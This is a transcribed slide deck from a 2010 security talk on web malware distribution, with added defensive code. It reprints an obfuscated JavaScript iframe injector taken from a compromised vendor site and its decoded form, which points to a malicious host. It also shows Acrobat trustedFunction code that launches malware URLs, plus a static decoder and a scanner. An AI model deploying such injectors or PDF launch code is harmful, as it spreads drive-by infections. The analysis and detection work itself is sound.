Scaling Web 2.0 Malware Infection

Aditya K Sood, Sr. Security Practitioner, Armorize, Santa Clara, US

Posted 19-Oct-2014 (46 slides)

Description

Given at TRISC 2010, Grapevine, Texas. http://www.trisc.org/speakers/aditya_sood/#p

The talk sheds light on new trends in web-based malware. Technology and insecurity go hand in hand. With the advent of new attacks and techniques, the distribution of malware through the web has increased tremendously. Browser-based exploits, mainly against Internet Explorer, have given birth to a new world of malware infection. Attackers spread malware by exploiting vulnerabilities and through drive-by downloads, using infection strategies such as malware distribution through IFRAME injections and Search Engine Optimization (SEO) poisoning. To understand the intrinsic behavior of this web-based malware, a systematic analysis of the logic behind it is required, and the samples have to be dissected from the bottom up in order to contain their damage. The talk covers structured methodologies and demonstrates static, dynamic and behavioral analysis of web malware, including PCAP analytics. Demonstrations illustrate the need for web malware analysis.

Transcript of Scaling Web 2.0 Malware Infection

Page 1: Scaling Web 2.0 Malware Infection

Scaling Web 2.0 Malware Infection______________________________________

Aditya K Sood, Sr. Security Practitioner

Armorize , Santa Clara US

Page 2: Scaling Web 2.0 Malware Infection

Disclaimer

All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current or any of my previous employers.

Page 3: Scaling Web 2.0 Malware Infection

About Me - $whoami

• Senior Security Practitioner, Armorize

http://www.armorize.com

• Founder, SECNICHE Security

http://www.secniche.org

• Worked previously for COSEINC as Senior Security Researcher and as Security Consultant for KPMG

• Author of written content for HITB E-Zine, Hakin9, Elsevier and USENIX journals

• Likes to do bug hunting and malware dissection

• Released advisories to forefront companies

• Active speaker at security conferences including RSA

Page 4: Scaling Web 2.0 Malware Infection

Agenda

Understanding The Malware Anatomy

The Vertical Risk – Malware Impact on Business

Top 10+ Web Malware Infection Strategies

2X Generation - Century Malware Trickeries

Case Study – Infection through PDF Trusted Functions

Demonstration

Page 5: Scaling Web 2.0 Malware Infection

Pattern

Understanding The Malware Anatomy

The Dependent Peripherals

Page 6: Scaling Web 2.0 Malware Infection

Malware Mess – Global Trifecta

Page 7: Scaling Web 2.0 Malware Infection

Malware Infection Rate

Page 8: Scaling Web 2.0 Malware Infection

Malware Retrospective and Classification

Top 5 Malware Categories

Trojan (31.2 %)
Downloader (25.6 %)
Backdoor (13.8 %)
Spyware (13.2 %)
Adware (4.9 %)

Top 5 Virus Families

Stuh (4.4 %)
Fraudload (3.9 %)
Monder (3.6 %)
Autorun (2.7 %)
Buzus (2.7 %)

Interdependency

Page 9: Scaling Web 2.0 Malware Infection

Malware - The Impact on Real World

Page 10: Scaling Web 2.0 Malware Infection

Malware Trends – The Attack Base

Financial abuse and mass identity theft

The mass destructor – Botnet infection and zombie hosts

Exploiting the link dependency – Pay Per click hijacking

Traffic manipulation – Open redirect vulnerabilities at large scale

Spyware, cryptovirology, ransomware, etc.

Distributed Denial of Service – the service death game, extortion

Industry change semantics – Malware activation change line

Infection through browsers and portable gadgets – the biggest step

Exploiting anti virus loopholes

Page 11: Scaling Web 2.0 Malware Infection

Malware Contributing Issues – Rising Steps

Publicly available malware source code

Malware distribution frameworks such as MPACK, NeoSploit, etc.

Unpatched vulnerabilities and loosely coupled patches

Demand for underground services and self exposure

Global surveillance mode and information stealing in the wild

Software discrepancies and inherited design flaws, e.g. in browsers.

Exploitation at web level is easy. It opens a door to System Level Fallacies.

Inappropriate security solutions deployed and irrelevant security paradigm

Botnet Infection – The easy way to launch diversified attack

Web sharing and centralized work functionality.

Page 12: Scaling Web 2.0 Malware Infection

Pattern

Understanding The Vertical Risk

Web Delivered Malware Impact on Business

Underground Market and Malware Flow Model

Page 13: Scaling Web 2.0 Malware Infection

Underground Malware Market Business - Statistics

© GDATA

Page 14: Scaling Web 2.0 Malware Infection

Practical Malware Flow Model

© Reihe Informatik. TR-2007-011

Malware Writers Role

Flow of Malware Websites

Page 15: Scaling Web 2.0 Malware Infection

Malware - The Impact on Real World

Page 16: Scaling Web 2.0 Malware Infection

Pattern

Malware – Sources of Infection

Web 2.0

Top 10+ Strategies of Distributing Malware through the Web

Page 17: Scaling Web 2.0 Malware Infection

Long Live Drive By Download – Base Web Malware Tactic

Page 18: Scaling Web 2.0 Malware Infection

(SEO) Poisoning – Driven with Malware

Page 19: Scaling Web 2.0 Malware Infection

Messengers – Infection at Instant State

Page 20: Scaling Web 2.0 Malware Infection

Networking Websites – TWITTER Malware Infection

Exploiting the trust relationship on Social Networking Websites

Spreading malware content through Tweets, Scraps, etc.

Chain Reaction – spreads very fast across website networks (URL shortening trick)

Page 21: Scaling Web 2.0 Malware Infection

Social Networking – FACEBOOK Malware Applications

Manipulating the Open API Calls

User centric control

Exploiting the design fallacies

Page 22: Scaling Web 2.0 Malware Infection

Social Networking – FACEBOOK MAIL Infection

Step 1

Step 2

Step 3

Page 23: Scaling Web 2.0 Malware Infection

Online Media Content – YouTube, Google Videos etc.

Page 24: Scaling Web 2.0 Malware Infection

Exploiting the Web of Trust – Human Touch

Page 25: Scaling Web 2.0 Malware Infection

Spyware, Ransomware and Other Variants

Page 26: Scaling Web 2.0 Malware Infection

Insidious Spamming – Email, Blogs, Redirectors etc.

Page 27: Scaling Web 2.0 Malware Infection

Botnets – Malware Infection at Large Scale

Page 28: Scaling Web 2.0 Malware Infection

Direct Malware Hosting – Infected Web Domains

Page 29: Scaling Web 2.0 Malware Infection

System Stringency – Exploiting the Exceptions

Page 30: Scaling Web 2.0 Malware Infection

Malware Kits – Automated Infection

Page 31: Scaling Web 2.0 Malware Infection

Case Study – Safety Labs Malware Infection

Malware Infecting the Security Service Provider Websites.

____________________________________________________________

It is unfortunate that even a security solution provider has been touched by the latest Internet IFRAME threats, or rather, infections.

Thousands of websites on the Internet have been compromised with malicious IFRAMEs which load exploit code designed to silently install trojans onto susceptible victims' computers.

Page 32: Scaling Web 2.0 Malware Infection

Case Study – Safety Labs Malware Infection

Page 33: Scaling Web 2.0 Malware Infection

Case Study – Safety Labs Malware Infection

OBFUSCATED JAVASCRIPT

<script language=javascript>
function mdban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,52,47,48,11,7,35,59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,0,58,40,31,60,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(221^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}
mdban('ZT8MVN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5MLE0DMXICGRADF@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5Y7@HD')
</script><!-- 213.219.250.100 -->

The decoder is a Base64 variant with a custom 64-symbol alphabet (digits, '@', upper-case letters, '_', lower-case letters; the table t maps charCode-48 to a 6-bit value), packed little-endian and XORed with 221 before each 1024-character block is passed to eval().

Note: the alphabet distinguishes upper- and lower-case letters, and the letter case of the encoded string was lost when the slide was transcribed, so the payload as printed here no longer decodes.

Script source is

http://www.safety-lab.com/audits/categorylist.pl?lang=en

Page 34: Scaling Web 2.0 Malware Infection

Case Study – Safety Labs Malware Infection

DEOBFUSCATED JAVASCRIPT

(1) Decoded JavaScript passed to eval()

window.status = 'done';
document.write('<iframe name=5B8F src="http://3pigs.info/t/?' + Math.round(Math.random() * 14490) + '5B8F' + '" width=322 height=45 style="display:none"></iframe>')

(2) Result written by the decoded JavaScript

<iframe name=5B8F src="http://3pigs.info/t/?58965B8F" width=322 height=45 style="display:none"></iframe>

http://3pigs.info/t/?58965B8F was injected as the source of the malicious file; the random number in the query string (5896 in this run) makes each generated URL differ.

The complexity factor is always high when decoding malicious JavaScript.
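The decoder above can be re-implemented with eval() replaced by a return value, so the generated HTML is read instead of executed. The block below is an added example, not code from the slides or from Armorize: the lookup table and XOR key are copied from the Safety Labs script, while the encoder, the sample script and the example.invalid host are constructed here so the round trip can be checked offline.

```javascript
// Added example: static re-implementation of the Safety Labs decoder with eval()
// replaced by a return value. TABLE and XOR_KEY are copied from the slide; the
// encoder, SAMPLE and the example.invalid host are constructed for this demo.

// index = charCode - 48 ('0'..'z'); 0 is filler for characters outside the
// alphabet, except index 50 ('b'), which genuinely maps to the 6-bit value 0.
const TABLE = [63,9,52,47,48,11,7,35,59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,
  32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,0,58,40,31,60,
  49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42];
const XOR_KEY = 221;

// Same bit handling as the malware's loop: six bits per character, packed
// little-endian, one byte emitted for every character except the first of each
// group of four. Returns the script text instead of calling eval() on it.
function decodePayload(encoded) {
  let out = '', w = 0, s = 0;
  for (let p = 0; p < encoded.length; p++) {
    w |= (TABLE[encoded.charCodeAt(p) - 48] || 0) << s;
    if (s) { out += String.fromCharCode(XOR_KEY ^ (w & 255)); w >>= 8; s -= 2; }
    else { s = 6; }
  }
  return out;
}

// Inverse mapping (6-bit value -> character) for the constructed encoder.
const ALPHABET = [];
TABLE.forEach((v, i) => { if (v !== 0 || i === 50) ALPHABET[v] = String.fromCharCode(i + 48); });

// Constructed encoder (not on the slide): XOR each byte, then emit ceil(8n/6)
// characters per group of up to three bytes, least significant bits first.
function encodePayload(text) {
  let enc = '';
  for (let i = 0; i < text.length; i += 3) {
    const bytes = Array.from(text.slice(i, i + 3), ch => (ch.charCodeAt(0) & 255) ^ XOR_KEY);
    const v = bytes.reduce((acc, b, k) => acc | (b << (8 * k)), 0);
    const nChars = Math.ceil(bytes.length * 8 / 6);
    for (let k = 0; k < nChars; k++) enc += ALPHABET[(v >> (6 * k)) & 63];
  }
  return enc;
}

// Constructed stand-in for the decoded iframe injector shown on the slide.
const SAMPLE = 'document.write(\'<iframe src="http://example.invalid/t/?\' + ' +
  'Math.round(Math.random() * 14490) + \'" width=322 height=45 style="display:none"></iframe>\')';

// Round trip: the decoded text is what the malware would have passed to eval().
function demo() { return decodePayload(encodePayload(SAMPLE)); }
```

Feeding a captured encoded string to decodePayload() gives the document.write() call for inspection without running it.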

Page 35: Scaling Web 2.0 Malware Infection

2X Generation Malware Trickeries

System File Patching and Code Injection

Code Interdependency – Malware Adjacency - Code Resuscitation.

Code Randomization, Obfuscation and Morphing

Rootkits and System Cloaking

Exploiting Active X and JavaScript Heaps – Direct Control

Page 36: Scaling Web 2.0 Malware Infection

Private & Confidential Property of Armorize

Escaping What !

Page 37: Scaling Web 2.0 Malware Infection

Malware Analysis Methodology (MAM) - Overview

End Point Communication
  Connection state check
  Server identity checks through the communication medium
  Error generation, e.g. checksum integrity
  Encrypted data in packets
  Protocol switching

Session Stream Analysis – Deep Inspection
  Analyzing the TCP stream session
  Extracting an executable from the raw data

Behavioral Analysis – Scrutinizing system fallacies
  Active debugging
  Black box testing approach

Static Analysis – Reversing the facets of malware
  It is all about analyzing the code of the malware

Page 38: Scaling Web 2.0 Malware Infection

Case Study – Malware Infection

PDF Trusted Functions

(Understanding the Facets of Malware)

Page 39: Scaling Web 2.0 Malware Infection

Some PDF Truths

Hyperlink execution notification as alerts

Data is not allowed to be stored in the forms

http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

A number of vulnerable functions have been removed, i.e. unregistered

Support for Adobe Reader 7.xx has been removed

http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html

Other alerts have been structured as security checks in standalone PDFs

Acrobat JavaScript does not support the DOM as normal JavaScript does.

Adobe has built-in functionality to provide code wrappers which call restricted functions in specific environments. For example, in general it is not possible to generate another PDF from a standalone PDF when it is opened.

Page 40: Scaling Web 2.0 Malware Infection

Understanding Malware Infection - PDF

Exploiting the browser – Downloading files through Windows Media Player

Exploiting global access to the Acrobat JavaScript folder

A hidden gift.js file containing malicious code is placed there

Page 41: Scaling Web 2.0 Malware Infection

Understanding Malware Infection - PDF

Calling Codes through Trusted Functions

The trusted function body calls app.beginPriv() (begin privileges) and app.endPriv() (end privileges) to enclose any function or code that is to run as trusted.

A trusted function can be called successfully during application initialization, and a number of restricted functions can be called through it.

myTrustedFunction = app.trustedFunction(
    function() { <function body> } );

New Scareware Message – Opening a new PDF

trustedDoc = app.trustedFunction(function (width, height) {
    app.beginPriv();
    var trustDoc = app.newDoc(width, height);
    trustDoc.addWatermarkFromText("X JERKED X");
    app.endPriv();
    return trustDoc;
});
trustedDoc(300, 300);

Page 42: Scaling Web 2.0 Malware Infection

Understanding Malware Infection - PDF

Calling Codes through Trusted Propagator Functions

myPropagatorFunction = app.trustPropagatorFunction(
    function() { <function body> } );

URL Opening - Drive by Download Infections

trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {
    app.beginPriv();
    var trustedDoc = app.launchURL(cURL, bNewFrame);
    app.endPriv();
    return trustedDoc;
});
trustedDoc("http://www.malware1.com", true);
trustedDoc("http://www.malware2.com", true);
trustedDoc("http://www.malware3.com", true);
trustedDoc("http://www.malware4.com", true);
trustedDoc("http://www.malware5.com", true);
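As an added defensive example (not from the slides or from Armorize), the block below is a small triage scanner for a folder-level Acrobat JavaScript file such as the hidden gift.js described above: it reports each app.trustedFunction / app.trustPropagatorFunction wrapper, whether the wrapper brackets its body with app.beginPriv()/app.endPriv(), which of the privileged APIs shown on the slides (app.launchURL, app.newDoc) it calls, and every URL literal in the file. The sample script and the example.invalid URLs are constructed.

```javascript
// Added example: static triage of a folder-level Acrobat JavaScript file such as
// the hidden gift.js from the slides. SAMPLE_GIFT_JS and the example.invalid URLs
// are constructed; the API names are the ones shown on the slides.

const WRAPPERS = ['app.trustedFunction', 'app.trustPropagatorFunction'];
const PRIVILEGED = ['app.launchURL', 'app.newDoc'];   // only the APIs the slides show

// Source text inside the parentheses opening at `open`, balancing nested
// parentheses and skipping quoted strings (good enough for triage, not a parser).
function balancedArgs(src, open) {
  let depth = 0, quote = null;
  for (let i = open; i < src.length; i++) {
    const ch = src[i];
    if (quote) { if (ch === quote && src[i - 1] !== '\\') quote = null; continue; }
    if (ch === '"' || ch === "'") quote = ch;
    else if (ch === '(') depth++;
    else if (ch === ')' && --depth === 0) return src.slice(open + 1, i);
  }
  return src.slice(open + 1);                 // unbalanced: take the rest
}

function scanFolderLevelScript(src) {
  const wrappers = [];
  for (const name of WRAPPERS) {
    for (let at = src.indexOf(name); at !== -1; at = src.indexOf(name, at + name.length)) {
      let open = at + name.length;
      while (open < src.length && /\s/.test(src[open])) open++;   // allow "app.trustedFunction\n("
      if (src[open] !== '(') continue;
      const body = balancedArgs(src, open);
      wrappers.push({
        wrapper: name,
        elevatesPrivilege: body.includes('app.beginPriv()') && body.includes('app.endPriv()'),
        privilegedCalls: PRIVILEGED.filter(api => body.includes(api + '(')),
      });
    }
  }
  // URL literals anywhere in the file: the slide passes them in at the call sites.
  const urls = Array.from(src.matchAll(/https?:\/\/[^'"\s)]+/g), m => m[0]);
  return { wrappers, urls };
}

// Constructed sample in the shape of the slide's launchURL wrapper.
const SAMPLE_GIFT_JS = `
trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {
  app.beginPriv();
  var d = app.launchURL(cURL, bNewFrame);
  app.endPriv();
  return d;
});
trustedDoc("http://example.invalid/drop1", true);
trustedDoc("http://example.invalid/drop2", true);
`;
```

A wrapper that elevates privilege and calls app.launchURL from a script dropped into the JavaScript folder is the pattern worth alerting on; the URL list gives the analyst the hosts to block.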

Page 43: Scaling Web 2.0 Malware Infection

Understanding Malware Infection - PDF

Page 44: Scaling Web 2.0 Malware Infection

Demonstration

Page 45: Scaling Web 2.0 Malware Infection

Questions and Queries

Page 46: Scaling Web 2.0 Malware Infection

Thanks and Regards

Special thanks to Armorize for pushing me to do more research.

http://www.armorize.com

__________________________________________________________________________________

Portal and Blog

SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com

(Screenshots shared from various resources)